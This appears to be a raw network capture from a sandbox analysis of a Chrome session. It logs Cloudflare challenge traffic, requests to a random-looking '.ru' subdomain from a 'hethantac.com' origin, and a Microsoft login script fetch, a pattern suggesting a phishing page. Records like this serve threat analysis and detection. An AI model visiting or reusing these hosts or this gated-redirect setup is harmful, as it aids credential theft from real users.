                                                                                                                                          Data Ascii: OnuuP7x4Mn58Lzszvno0QD4xPTWAvDZDgnxAe0AEOUDDunZ9RMX/dMB3/0iGfjhEx4L6Bci/e0KJystEykHOSkZMxY6MQ8bEC4jAiIyKCo/OEA5HDohLy9FIhJFQTkiWVE7JzZJMi5jVTM7VUVfQmpdOh9LYT9DYV5VPi5tV1NSZk5Kc3FObXFhe16DeVeJZ2tqiVmEYF+BcYtui4lmlWWQbGt7kW6dbZiEc5WFn4JhnXqpeaSQf4+lgrGBq66H


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          27192.168.2.1655142104.18.94.414436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:33 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1512118397:1731904877:TnwUrGDVXMUQ2jl9jRbdEbOt6FgQBC_z5tcXttgieII/8e45aa726acf4857/UtKjiU2c7yTs172l3wH9C9r2Jv4xfho8ENvByZh_3Vs-1731908846-1.1.1.1-1ET3XDspxh5uTlHAswN2STjUqCEhAWy6108Zb.RbPav.9Pumy0Tiz2gMRVxyjvOg HTTP/1.1
                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:33 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:33 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 7
                                                                                                                                          Connection: close
                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                          cf-chl-out: 54F0a5hgnzl+JL8nLO2cu4XKl6wLJ92yaNc=$CFqhbkkFeTrqfz1V
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e45aa9c89c7b78f-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-18 05:47:33 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                          Data Ascii: invalid


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          28192.168.2.1655143104.18.94.414436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:35 UTC1151OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1512118397:1731904877:TnwUrGDVXMUQ2jl9jRbdEbOt6FgQBC_z5tcXttgieII/8e45aa726acf4857/UtKjiU2c7yTs172l3wH9C9r2Jv4xfho8ENvByZh_3Vs-1731908846-1.1.1.1-1ET3XDspxh5uTlHAswN2STjUqCEhAWy6108Zb.RbPav.9Pumy0Tiz2gMRVxyjvOg HTTP/1.1
                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          Content-Length: 34532
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          CF-Challenge: UtKjiU2c7yTs172l3wH9C9r2Jv4xfho8ENvByZh_3Vs-1731908846-1.1.1.1-1ET3XDspxh5uTlHAswN2STjUqCEhAWy6108Zb.RbPav.9Pumy0Tiz2gMRVxyjvOg
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/ds4t7/0x4AAAAAAAz8LupiazIQW55I/auto/fbE/normal/auto/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:35 UTC16384OUTData Raw: 76 5f 38 65 34 35 61 61 37 32 36 61 63 66 34 38 35 37 3d 31 4e 77 33 74 4f 57 65 32 4b 32 6a 32 57 69 57 51 24 64 24 56 68 42 57 72 24 74 33 6b 33 57 42 65 57 73 24 51 35 53 66 24 69 4f 57 6d 24 73 66 55 30 57 53 56 31 24 41 66 77 68 65 46 57 78 55 30 24 62 52 33 24 31 33 42 69 24 6b 33 33 4f 35 24 57 30 66 57 25 32 62 24 6a 73 53 57 77 41 36 52 57 36 6e 4f 41 57 4f 64 48 24 52 75 32 32 6b 7a 2b 24 68 7a 59 5a 5a 32 32 62 6e 78 6a 24 58 7a 59 43 24 4b 77 51 24 44 54 51 48 33 45 30 24 31 32 48 48 54 77 75 24 4f 4e 24 68 36 32 24 34 54 56 48 48 67 43 4b 69 52 24 67 42 6b 58 43 70 52 24 35 48 34 42 75 4e 51 58 36 6b 24 62 58 39 57 6c 4f 66 33 24 51 36 33 24 4a 57 74 35 6a 45 52 66 24 73 32 53 75 48 47 34 4f 63 35 37 34 24 41 64 37 4d 7a 64 6b 5a 35 53 4d 57
                                                                                                                                          Data Ascii: v_8e45aa726acf4857=1Nw3tOWe2K2j2WiWQ$d$VhBWr$t3k3WBeWs$Q5Sf$iOWm$sfU0WSV1$AfwheFWxU0$bR3$13Bi$k33O5$W0fW%2b$jsSWwA6RW6nOAWOdH$Ru22kz+$hzYZZ22bnxj$XzYC$KwQ$DTQH3E0$12HHTwu$ON$h62$4TVHHgCKiR$gBkXCpR$5H4BuNQX6k$bX9WlOf3$Q63$JWt5jERf$s2SuHG4Oc574$Ad7MzdkZ5SMW
                                                                                                                                          2024-11-18 05:47:35 UTC16384OUTData Raw: 4f 78 6f 76 63 71 2b 69 52 24 33 4f 48 62 73 62 38 59 4b 52 24 24 2d 71 42 24 32 24 38 24 68 4a 62 4e 24 2b 33 24 33 71 72 24 65 4e 42 6e 57 79 77 36 48 77 32 4f 6f 50 6f 6f 30 4c 4f 33 57 70 24 4b 33 62 32 24 67 24 68 33 57 4e 24 56 57 46 2b 43 50 71 36 24 73 52 4f 54 24 4d 33 2b 50 4f 30 24 64 33 6a 66 24 42 24 2d 24 6a 65 57 70 24 71 75 57 77 62 35 24 79 33 4f 24 57 6a 24 41 59 38 32 62 51 24 67 24 31 72 62 58 24 4a 33 57 7a 62 55 33 37 33 62 7a 62 76 24 5a 33 4f 4e 62 54 24 2d 33 41 33 57 68 4e 69 4b 2b 6a 57 32 24 4b 33 57 24 57 66 57 4c 7a 31 24 62 6e 65 48 24 6a 33 57 68 33 76 24 55 33 4f 4a 24 64 33 55 70 4f 68 24 62 24 62 33 4f 32 57 68 74 4b 77 62 71 57 45 52 57 6d 57 6f 24 24 6a 74 52 4f 30 57 44 75 4a 52 58 71 24 4f 33 4a 7a 74 36 24 6e 33 62
                                                                                                                                          Data Ascii: Oxovcq+iR$3OHbsb8YKR$$-qB$2$8$hJbN$+3$3qr$eNBnWyw6Hw2OoPoo0LO3Wp$K3b2$g$h3WN$VWF+CPq6$sROT$M3+PO0$d3jf$B$-$jeWp$quWwb5$y3O$Wj$AY82bQ$g$1rbX$J3WzbU373bzbv$Z3ONbT$-3A3WhNiK+jW2$K3W$WfWLz1$bneH$j3Wh3v$U3OJ$d3UpOh$b$b3O2WhtKwbqWERWmWo$$jtRO0WDuJRXq$O3Jzt6$n3b
                                                                                                                                          2024-11-18 05:47:35 UTC1764OUTData Raw: 58 69 6b 55 44 75 79 31 65 4f 53 6c 39 79 6a 4f 78 59 33 61 24 66 34 5a 33 58 6e 79 6e 58 37 51 58 43 78 69 57 75 24 24 30 50 73 6c 67 38 69 33 24 42 33 61 67 78 59 6d 56 72 55 67 48 70 68 24 72 4e 52 73 4e 35 33 4f 4b 6d 44 59 6e 59 58 34 53 77 34 6b 57 78 62 5a 69 52 57 31 76 37 7a 39 65 41 52 62 35 2d 6d 45 6c 2b 62 2d 24 56 69 65 68 62 6b 61 35 52 4b 6d 67 6f 59 43 24 68 69 24 54 63 43 24 4a 67 68 36 4e 34 24 4f 66 62 71 33 54 57 44 51 24 47 55 6f 6a 57 6b 6b 32 24 66 71 6f 6a 4f 68 70 32 33 4a 7a 24 6d 45 6b 33 32 4c 24 6a 66 68 75 6e 33 67 77 72 41 62 4b 42 75 61 66 4d 30 4c 68 67 51 5a 6f 32 77 50 4a 56 4c 6d 41 37 70 73 39 6e 4e 42 77 4e 62 6f 37 46 68 50 38 6e 30 52 58 68 43 6d 6e 59 24 45 33 42 67 62 4b 66 39 24 55 68 4f 48 24 41 4f 52 47 46 71
                                                                                                                                          Data Ascii: XikUDuy1eOSl9yjOxY3a$f4Z3XnynX7QXCxiWu$$0Pslg8i3$B3agxYmVrUgHph$rNRsN53OKmDYnYX4Sw4kWxbZiRW1v7z9eARb5-mEl+b-$Viehbka5RKmgoYC$hi$TcC$Jgh6N4$Ofbq3TWDQ$GUojWkk2$fqojOhp23Jz$mEk32L$jfhun3gwrAbKBuafM0LhgQZo2wPJVLmA7ps9nNBwNbo7FhP8n0RXhCmnY$E3BgbKf9$UhOH$AORGFq
                                                                                                                                          2024-11-18 05:47:35 UTC1361INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:35 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Content-Length: 4552
                                                                                                                                          Connection: close
                                                                                                                                          cf-chl-out-s: 3rT9jou/zfpETcS1JfqQ3zyvMkDLo8lPFc4L0Qv+mPaIyX+M0GMr8NisPPvSq30HzxmLHK8q3rhfl+NUQCOKrAl7qt6hhC4wOlVuXyKZjfklgTfu4z6i+KAt77KmaCPXpl4xipHGlNhH/xg7u6yTnhB1lzSmSatcdwDtSmws7v88hZluzRTVVPeC88JI4ssVCiDcUXRMyjPPj9a/A9mF5HrlmHVuCAKKrqie0d/OLvHAC+DIpvWvyZ+rsp2rCAhZvjU3zeOcP63XNRX77E059KCEdO9O77vXc6HtfVvC7IUhqlkUzFa+6eLW2/WDCuTLgIdxn/GYrW4kiNIizhICDv7lqOkIJdjW2BbiH9HoTjDNLBTwfRzHh89l8qNjwM+s6Qnw8b8gh1AYDJ7dGckannyAWvzd0N6KvW45QZiD7DL3lBtjPvk/duaPhH0I2BeR2RI3RwtAel7Q4QK8Fm+E4SJYFB3zhg/5mKIbUgpc+XJDtgmkyeH1VQQq8DVUs5KG+f4XNLYOgJgwkJOZ+yicDlkFNGKe6vNF2emp1msCbYUpgDvDmErGsVXazqYDfFV4WtReAADx5VHrN9ZytSKp7yh94gyaWUZmy6OaKpzd3juj4CDqCMk6EyGuhkVe9hzlfAfkHp0tHqzfbUvV9OAwgCfdXMuwyRR1aXTin4kfx5wBoqe69L2g760EJBccE/uisQ96N30W5XscP1lhxQv+tWym1p9uFVBqAfrGKLaCtHkb08wy+00OmLN9sxGLFSzbwOK4ek/o7TahL5azSOKRk6x6dSbQPRpRgmtHsphnYmJw15mScNNrHZCKpuTgm0VnRe0k5d8wy9oS+Jd03M3M66AThzxVPQIYG57JMkZ22ErKQnwdxZsJwx0KfcRpfXQGymJ5C9TPLVg99sLjCvFge+3OSxQzX4ERayugR5V6Uq00PJAK1x1WGscR1O3EeeUt1DSFno4He0tsvnY9kOsKe8DxVBmhReY=$m1RVV41rcupTa8J9
                                                                                                                                          cf-chl-out: x9rOPXdrdRCBIFSJcdMVfABoRPga+SELK0Wdw3m81RPki+H8c1OlbcevaTLgwyjr8PpMKztzaNbpVAWkUkOS9/78l8Lk60X5W9Q+QMKK36gIvpNx98a564k=$1kl0fTqYuPwLNcUA
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e45aaabca254686-DFW
                                                                                                                                          2024-11-18 05:47:35 UTC32INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-18 05:47:35 UTC1345INData Raw: 65 37 36 2f 77 70 66 48 6c 62 4f 5a 6c 59 69 76 6d 36 7a 47 77 61 6e 53 74 62 57 67 78 38 75 73 71 4c 58 59 30 4a 69 38 71 62 2b 33 35 4e 2f 69 76 74 6a 57 33 63 69 6a 7a 4e 6d 76 33 4d 54 6d 73 4b 62 49 36 72 62 6c 32 4f 71 36 2b 66 4b 2b 2f 66 66 65 2b 75 54 67 76 66 50 6c 2b 38 48 7a 35 51 4c 4e 39 74 7a 6f 33 66 48 6d 37 77 41 56 37 4f 4c 35 47 67 72 78 45 4e 33 70 2b 51 7a 39 38 76 30 47 39 66 49 48 2f 52 62 64 47 50 67 58 4d 41 59 6e 37 75 73 4b 41 51 63 35 4e 43 73 63 4d 54 66 30 4d 77 38 76 4f 44 49 50 48 53 62 38 46 55 63 42 49 42 70 4d 51 43 34 73 4d 43 51 75 55 55 35 43 4e 6c 64 43 54 67 31 47 47 7a 38 76 47 6c 70 5a 4e 6b 78 51 4f 54 34 77 49 47 6c 45 4a 6c 38 6d 61 6d 51 75 51 56 74 43 61 33 52 6e 59 32 39 49 53 6d 6f 30 4f 6e 52 75 64 57 4e
                                                                                                                                          Data Ascii: e76/wpfHlbOZlYivm6zGwanStbWgx8usqLXY0Ji8qb+35N/ivtjW3cijzNmv3MTmsKbI6rbl2Oq6+fK+/ffe+uTgvfPl+8Hz5QLN9tzo3fHm7wAV7OL5GgrxEN3p+Qz98v0G9fIH/RbdGPgXMAYn7usKAQc5NCscMTf0Mw8vODIPHSb8FUcBIBpMQC4sMCQuUU5CNldCTg1GGz8vGlpZNkxQOT4wIGlEJl8mamQuQVtCa3RnY29ISmo0OnRudWN
                                                                                                                                          2024-11-18 05:47:35 UTC1369INData Raw: 58 47 48 73 70 65 61 75 4a 47 66 6a 70 71 61 6f 36 43 38 67 61 69 58 67 62 79 6d 6d 4d 33 48 78 34 69 69 6f 38 71 4d 77 4a 57 33 6c 62 71 75 75 73 57 71 6e 63 75 74 34 4e 2b 39 32 71 2f 64 79 4d 66 6c 74 63 72 49 36 4b 6a 50 35 64 4b 78 33 2b 7a 6f 31 66 48 45 32 72 58 79 73 37 58 37 33 76 58 38 39 39 2f 36 30 76 66 6e 36 4e 63 45 2b 51 4c 4b 44 66 30 46 30 52 41 44 34 41 30 43 42 76 54 5a 2b 66 76 71 37 68 51 4b 37 76 62 31 42 51 58 36 34 51 49 63 45 69 49 47 4a 76 76 36 48 51 30 75 4b 78 4d 42 4b 66 4d 76 4c 50 45 6e 47 76 55 72 43 78 73 70 51 67 38 69 4f 68 52 46 51 42 73 32 50 7a 6c 42 42 30 6b 76 4f 69 42 4d 4c 55 6b 72 43 56 49 34 47 6b 67 39 55 79 64 4d 50 78 77 34 56 31 31 50 50 31 64 48 52 30 64 54 52 6c 39 6c 53 55 6c 6e 50 31 4a 51 51 6d 31 70
                                                                                                                                          Data Ascii: XGHspeauJGfjpqao6C8gaiXgbymmM3Hx4iio8qMwJW3lbquusWqncut4N+92q/dyMfltcrI6KjP5dKx3+zo1fHE2rXys7X73vX899/60vfn6NcE+QLKDf0F0RAD4A0CBvTZ+fvq7hQK7vb1BQX64QIcEiIGJvv6HQ0uKxMBKfMvLPEnGvUrCxspQg8iOhRFQBs2PzlBB0kvOiBMLUkrCVI4Gkg9UydMPxw4V11PP1dHR0dTRl9lSUlnP1JQQm1p
                                                                                                                                          2024-11-18 05:47:35 UTC1369INData Raw: 75 55 6e 37 75 4d 78 49 36 37 70 70 58 47 78 37 4f 63 6c 4d 53 72 70 4b 57 2b 30 4a 47 72 6f 4e 4b 4a 69 6f 2f 4f 6d 34 37 47 31 5a 32 33 32 71 71 34 72 71 4f 2b 33 38 44 46 6f 63 44 6e 34 75 76 43 78 37 43 2f 78 38 2f 41 73 4c 48 30 73 37 6d 35 36 65 61 33 31 65 33 63 33 4d 44 30 77 37 2f 64 34 4e 48 54 33 75 44 4c 79 38 37 2b 36 42 44 4a 45 64 51 52 36 67 51 4c 47 4e 54 53 44 2f 37 66 39 2f 44 34 4a 65 7a 31 49 75 41 57 47 4f 48 6c 4b 41 49 71 37 54 48 6e 48 65 7a 38 41 53 62 77 4a 66 63 4b 44 77 55 4f 50 2f 6b 59 4d 45 50 2b 4d 54 38 48 43 50 6f 41 4e 52 52 49 48 53 67 4a 50 43 6b 2f 56 53 30 65 4a 42 63 78 4c 6c 55 76 57 7a 55 31 46 6b 77 71 48 79 49 38 49 46 4d 6b 56 6b 46 48 50 32 68 76 59 45 4d 38 55 57 73 6d 4b 32 41 75 54 44 6c 72 65 48 31 53 58
                                                                                                                                          Data Ascii: uUn7uMxI67ppXGx7OclMSrpKW+0JGroNKJio/Om47G1Z232qq4rqO+38DFocDn4uvCx7C/x8/AsLH0s7m56ea31e3c3MD0w7/d4NHT3uDLy87+6BDJEdQR6gQLGNTSD/7f9/D4Jez1IuAWGOHlKAIq7THnHez8ASbwJfcKDwUOP/kYMEP+MT8HCPoANRRIHSgJPCk/VS0eJBcxLlUvWzU1FkwqHyI8IFMkVkFHP2hvYEM8UWsmK2AuTDlreH1SX
                                                                                                                                          2024-11-18 05:47:35 UTC469INData Raw: 55 77 6e 33 49 78 38 6d 65 75 4a 7a 42 6a 73 75 63 6a 6f 75 70 6b 36 32 4f 79 62 58 59 33 4c 48 4b 6c 4a 66 61 7a 72 36 5a 7a 39 62 45 6e 62 2b 6f 74 62 2f 44 36 73 2f 43 38 64 47 2f 75 2b 48 75 7a 4c 44 69 73 50 65 31 31 4e 7a 65 30 76 76 63 34 4c 37 44 76 2f 34 4a 79 50 4c 48 78 51 66 44 41 75 54 2b 37 64 76 62 41 74 44 4e 33 78 62 55 30 75 4d 4f 36 52 7a 6f 2b 74 77 6a 36 79 50 31 38 66 76 77 39 53 7a 68 47 77 6f 77 35 53 49 4a 35 41 63 6d 2f 54 45 4d 45 2f 51 31 42 44 73 4b 43 68 4d 75 2f 41 73 5a 44 51 34 55 48 44 63 65 52 68 51 59 49 6b 30 6b 47 31 41 4c 4b 45 56 55 49 53 42 58 4c 69 59 77 4b 44 59 6e 4e 54 6b 2b 58 54 6c 53 4a 42 6c 63 4a 55 6c 54 54 47 78 62 4b 33 41 77 61 31 41 72 59 6c 46 49 62 58 56 57 62 30 5a 6f 54 6c 35 2f 65 32 78 73 55 6b
                                                                                                                                          Data Ascii: Uwn3Ix8meuJzBjsucjoupk62OybXY3LHKlJfazr6Zz9bEnb+otb/D6s/C8dG/u+HuzLDisPe11Nze0vvc4L7Dv/4JyPLHxQfDAuT+7dvbAtDN3xbU0uMO6Rzo+twj6yP18fvw9SzhGwow5SIJ5Acm/TEME/Q1BDsKChMu/AsZDQ4UHDceRhQYIk0kG1ALKEVUISBXLiYwKDYnNTk+XTlSJBlcJUlTTGxbK3Awa1ArYlFIbXVWb0ZoTl5/e2xsUk


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          29192.168.2.1655144104.18.94.414436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:36 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1512118397:1731904877:TnwUrGDVXMUQ2jl9jRbdEbOt6FgQBC_z5tcXttgieII/8e45aa726acf4857/UtKjiU2c7yTs172l3wH9C9r2Jv4xfho8ENvByZh_3Vs-1731908846-1.1.1.1-1ET3XDspxh5uTlHAswN2STjUqCEhAWy6108Zb.RbPav.9Pumy0Tiz2gMRVxyjvOg HTTP/1.1
                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:36 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:36 GMT
                                                                                                                                          Content-Type: application/json
                                                                                                                                          Content-Length: 7
                                                                                                                                          Connection: close
                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                          cf-chl-out: qDenIu6fPaUTZjm6j/gsuYCz5UjFKEnSC1Y=$EGINC8oyDmNqcEkh
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e45aab1b98a6c44-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          2024-11-18 05:47:36 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                          Data Ascii: invalid


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          30192.168.2.1655145188.114.97.34436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:36 UTC669OUTGET /yhLPPHQxZfXkDAHXPFtWbCaEGFqyqLULWDEHCYEELIQZRNENRPHOMHUBA HTTP/1.1
                                                                                                                                          Host: jvzxo0nqcg4l1coovlpwctdcqgvywe8bgipczfymr9jhs03hab4hzwtc.birsbunh.ru
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Origin: https://supernova.hethantac.com
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Referer: https://supernova.hethantac.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:37 UTC879INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:37 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k5jLYYTjqP2XKJkWAYBHhPTIUuXvomTIgPt%2BeqkVvCChQhsQqQ09FdNgOj7yos8lRln7%2FeEPlOgwD%2FzaMBwl5uinsDnVuyVNplzg42k1Y1YZtJfQCkD4ARIzcuk5t5pIlECCi8l0sRQ%2BLiWzraLKwi3Lrdk1xvzYIJsiN%2FdgXsYn%2FtqhI7i4eRXz5fw63yLoRZc%2FsM%2Fq4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e45aab34beae7c3-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1410&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1247&delivery_rate=1863577&cwnd=251&unsent_bytes=0&cid=fcda0f383788d410&ts=767&x=0"
                                                                                                                                          2024-11-18 05:47:37 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                          Data Ascii: 11
                                                                                                                                          2024-11-18 05:47:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          31192.168.2.1655148188.114.96.34436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:38 UTC449OUTGET /yhLPPHQxZfXkDAHXPFtWbCaEGFqyqLULWDEHCYEELIQZRNENRPHOMHUBA HTTP/1.1
                                                                                                                                          Host: jvzxo0nqcg4l1coovlpwctdcqgvywe8bgipczfymr9jhs03hab4hzwtc.birsbunh.ru
                                                                                                                                          Connection: keep-alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:39 UTC879INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:38 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PXO6brFflLF6tiLO82NEwgGec%2FaV9DOQewlDTXKNGxOYspCTBi5Dxisw5q3bGOFCq0mw8xlYmZGKS6ExJXH4eeXABCiQGMHrNI%2FqGa%2FjI0BtefTBZZRkun12CFxx703hPeh%2BrbA2Wo9WeDbOry%2FiLsGc5JtaTh%2FVxLFEHwAhgz00y3DtyDpwFfl%2FTfqLEw%2FgqKaRYtONqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e45aabcadae3470-DFW
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1384&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1027&delivery_rate=2238021&cwnd=251&unsent_bytes=0&cid=f3545077706558a3&ts=737&x=0"
                                                                                                                                          2024-11-18 05:47:39 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                          Data Ascii: 11
                                                                                                                                          2024-11-18 05:47:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          32192.168.2.165515113.107.246.604436248C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-18 05:47:41 UTC633OUTGET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1
                                                                                                                                          Host: aadcdn.msauth.net
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          Origin: https://login.microsoftonline.com
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: */*
                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                          Referer: https://login.microsoftonline.com/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-18 05:47:41 UTC797INHTTP/1.1 200 OK
                                                                                                                                          Date: Mon, 18 Nov 2024 05:47:41 GMT
                                                                                                                                          Content-Type: application/x-javascript
                                                                                                                                          Content-Length: 49911
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                          Content-Encoding: gzip
                                                                                                                                          Last-Modified: Wed, 02 Oct 2024 20:05:23 GMT
                                                                                                                                          ETag: 0x8DCE31D8CF87EF9
                                                                                                                                          x-ms-request-id: 0345acd4-b01e-0059-16e7-37336a000000
                                                                                                                                          x-ms-version: 2009-09-19
                                                                                                                                          x-ms-lease-status: unlocked
                                                                                                                                          x-ms-blob-type: BlockBlob
